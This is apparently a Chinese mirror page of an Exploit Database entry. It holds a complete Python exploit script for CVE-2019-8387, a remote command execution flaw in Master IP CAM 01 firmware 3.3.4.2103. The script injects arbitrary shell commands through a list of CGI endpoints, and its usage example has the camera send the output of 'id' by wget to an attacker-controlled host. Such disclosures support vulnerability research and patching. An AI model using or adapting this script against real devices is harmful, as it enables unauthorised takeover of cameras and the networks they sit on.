Master IP CAM 01 3.3.4.2103 – Remote Command Execution

• Exploit Database
• 105 阅读

• 作者： Raffaele Sabato
  日期： 2019-02-18
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/46400/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53

  # Exploit Title: Master IP CAM 01 Remote Command Execution # Date: 09-02-2019 # Remote: Yes # Exploit Authors: Raffaele Sabato # Contact: https://twitter.com/syrion89 # Vendor: Master IP CAM # Version: 3.3.4.2103 # CVE: CVE-2019-8387   import sys import requests     if len(sys.argv) < 3: print "[-] Usage: python MasterIpCamRCE.py <ip> <cmd>" print "[-] Example: python MasterIpCamRCE.py 192.168.1.54 &apos;wget http://192.168.1.55:4444/$(id)&apos;" exit(1)   host = sys.argv[1] command = sys.argv[2] page = [ "bconf.cgi", "ddns_start.cgi", "getddnsattr.cgi", "getinetattr.cgi", "getnettype.cgi", "getupnp.cgi", "getwifiattr.cgi", "getwifistatus.cgi", "inetconfig.cgi", "iptest.cgi", "listwifiap.cgi", "p2p.cgi", "paraconf.cgi", "scanwifi.cgi", "setadslattr.cgi", "setddnsattr.cgi", "setinetattr.cgi", "setwifiattr.cgi", "upnp_start.cgi", "wifimode.cgi", "wifitest.cgi", ] for x in page: url = "http://"+host+"/cgi-bin/"+x+"?cmd=<code>"+command+"</code>" #url = "http://"+host+"/cgi-bin/"+x+"?action=<code>"+command+"</code>" print "[*] Attack on "+x print "[+] Sending the payload" r = requests.get(url) if r.status_code == 200: print "[+] Exploit Success" break